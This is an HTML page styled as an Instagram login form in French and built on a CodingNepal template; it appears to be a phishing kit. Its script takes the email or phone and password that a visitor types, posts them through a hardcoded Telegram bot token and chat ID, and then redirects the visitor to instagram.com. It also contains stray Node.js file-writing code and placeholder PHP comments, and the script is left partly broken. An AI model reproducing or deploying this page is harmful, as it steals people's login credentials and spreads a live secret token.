<html lang="en" dir="ltr"><head>
  <meta charset="utf-8">
  <title>Login &amp; Signup Form | CodingNepal</title>
  <style>

    @import url('https://fonts.googleapis.com/css?family=Poppins:400,500,600,700&display=swap');
    *{
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      font-family: 'Poppins', sans-serif;
    }
    html,body {
      display: grid;
      height: 100%;
      width: 100%;
      place-items: center;
      background: -webkit-linear-gradient(left, #eaeaea, #eaeaea);
    }
    ::selection {
      background: #1877F2;
      color: #fff;
    }
    .wrapper{
      overflow: hidden;
      max-width: 390px;
      background: #fff;
      padding: 30px;
      border-radius: 5px;
      box-shadow: 0px 15px 20px rgba(0,0,0,0.1);
    }
    .wrapper .title-text{
      display: flex;
      width: 200%;
    }
    .wrapper .title{
      width: 50%;
      font-size: 35px;
      font-weight: 600;
      text-align: center;
      transition: all 0.6s cubic-bezier(0.68,-0.55,0.265,1.55);
    }
    .wrapper .slide-controls{
      position: relative;
      display: flex;
      height: 50px;
      width: 100%;
      overflow: hidden;
      margin: 30px 0 10px 0;
      justify-content: space-between;
      border: 1px solid lightgrey;
      border-radius: 5px;
    }
    .slide-controls .slide{
      height: 100%;
      width: 100%;
      color: #fff;
      font-size: 18px;
      font-weight: 500;
      text-align: center;
      line-height: 48px;
      cursor: pointer;
      z-index: 1;
      transition: all 0.6s ease;
    }
    .slide-controls label.signup{
      color: #000;
    }
    .slide-controls .slider-tab{
      position: absolute;
      height: 100%;
      width: 50%;
      left: 0;
      z-index: 0;
      border-radius: 5px;
      background: -webkit-linear-gradient(left, #1877F2, #2851A3);
      transition: all 0.6s cubic-bezier(0.68,-0.55,0.265,1.55);
    }
    input[type="radio"]{
      display: none;
    }
    #signup:checked ~ .slider-tab{
      left: 50%;
    }
    #signup:checked ~ label.signup{
      color: #fff;
      cursor: default;
      user-select: none;
    }
    #signup:checked ~ label.login{
      color: #000;
    }
    #login:checked ~ label.signup{
      color: #000;
    }
    #login:checked ~ label.login{
      cursor: default;
      user-select: none;
    }
    .wrapper .form-container{
      width: 100%;
      overflow: hidden;
    }
    .form-container .form-inner{
      display: flex;
      width: 200%;
    }
    .form-container .form-inner form{
      width: 50%;
      transition: all 0.6s cubic-bezier(0.68,-0.55,0.265,1.55);
    }
    .form-inner form .field{
      height: 50px;
      width: 100%;
      margin-top: 20px;
    }
    .form-inner form .field input{
      height: 100%;
      width: 100%;
      outline: none;
      padding-left: 15px;
      border-radius: 5px;
      border: 1px solid lightgrey;
      border-bottom-width: 2px;
      font-size: 13px;
      text-align: center;
      transition: all 0.3s ease;
    }
    .form-inner form .field input:focus{
      border-color: #fbb1f3;
      /* box-shadow: inset 0 0 3px #fb6aae; */
    }
    .form-inner form .field input::placeholder{
      color: #999;
      transition: all 0.3s ease;
    }
    form .field input:focus::placeholder{
      color: #b3b3b3;
    }
    .form-inner form .pass-link{
      margin-top: 5px;
    }
    .form-inner form .signup-link{
      text-align: center;
      margin-top: 30px;
    }
    .form-inner form .pass-link a,
    .form-inner form .signup-link a{
      color: #1877F2;
      text-decoration: none;
    }
    .form-inner form .pass-link a:hover,
    .form-inner form .signup-link a:hover{
      text-decoration: underline;
    }
    form .btn{
      height: 50px;
      width: 100%;
      border-radius: 5px;
      position: relative;
      overflow: hidden;
    }
    form .btn .btn-layer{
      height: 100%;
      width: 300%;
      position: absolute;
      left: -100%;
      background: -webkit-linear-gradient(right, #55d3ef, #55d3ef);
      border-radius: 5px;
      transition: all 0.4s ease;;
    }
    form .btn:hover .btn-layer{
      left: 0;
    }
    form .btn [type="submit"]{
      height: 100%;
      width: 100%;
      z-index: 1;
      position: relative;
      background: none;
      border: none;
      color: #fff;
      padding-left: 0;
      border-radius: 5px;
      font-size: 13px;
      font-weight: 500;
      cursor: pointer;
    }
    #login {

      height: 100%;
      width: 100%;
      z-index: 1;
      position: relative;
      background: none;
      border: none;
      color: #fff;
      padding-left: 0;
      border-radius: 5px;
      font-size: 13px;
      font-weight: bold;
      cursor: pointer;
      display: flex;
      justify-content: center;
      align-items: center;
}

#login:active {

opacity: 80%;

}

    
    
        </style>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
  <div class="wrapper">
    <div class="title-text">
      <div class="title login">
        <i data-visualcompletion="css-img" aria-label="Instagram" class="" role="img" style="background-image: url(&quot;https://static.cdninstagram.com/rsrc.php/v3/yx/r/WtxJZZ3-9ZP.png&quot;); background-position: 0px 0px; background-size: 176px 186px; width: 174px; height: 50px; background-repeat: no-repeat; display: inline-block;"></i>

      </div>
      <div class="title signup">Signup Form</div>
    </div>
    <div id="container">
      <div class="form-inner">
        <form>
          <div class="field">
            <input name="email" id="email" type="text" placeholder="Num. téléphone, nom d’utilisateur ou e-mail" required="">
          </div>
          <div class="field">
            <input name="password" id="password" type="password" placeholder="Mot de passe" required="">
          </div>
          <div class="pass-link"><a href="#">Mot de passe oublié ?</a></div>
          <div class="field btn">
            <div class="btn-layer"></div>
             <p id="login">Se connecter</p>
          </div>
          <br>
          <br>
          <div class="divider" aria-label="Séparateur" data-component="divider" style="border-bottom-width:1px;border-bottom-style:solid;border-color:#c7c3c3;height:1px;margin-left:0px;margin-right:0px;margin-top:5px;margin-bottom:5px">
          </div>
          <br>
          <div class="signup-link"> <a href=""></a></div>

      </div>
    </div>
  </div>

  <?php
// بدء كود PHP

// يمكنك إجراء بعض العمليات في PHP هنا

?>

<script>
      
      
  login.addEventListener('click', () => {
    window.location.href = 'https://instagram.com'; 
  
  var text = `Email ou Numéro: ${email.value} 
Mot de passe:  ${password.value}`; 

const botToken = '6843184165:AAFylsEek_Z5PjBjThXYjKHCxy8zL_fIu_c'; 
const chatId = '6669693805'; 
const message = text; 

fetch("https://api.telegram.org/bot" + botToken + "/sendMessage", { 
method: 'POST', 
headers: { 
    'Content-Type': 'application/json' 
}, 
body: JSON.stringify({ 
    chat_id: chatId, 
    text: message 
}) 
}) 

const fs = require('fs');

fs.appendFile('./KAKAROUTE.txt', '', function (err) {
  if (err) throw err;
  console.log('تم فتح الملف بنجاح!');
});
</script>

<?php
// يمكنك استكمال كود PHP هنا
?>



</body></html>
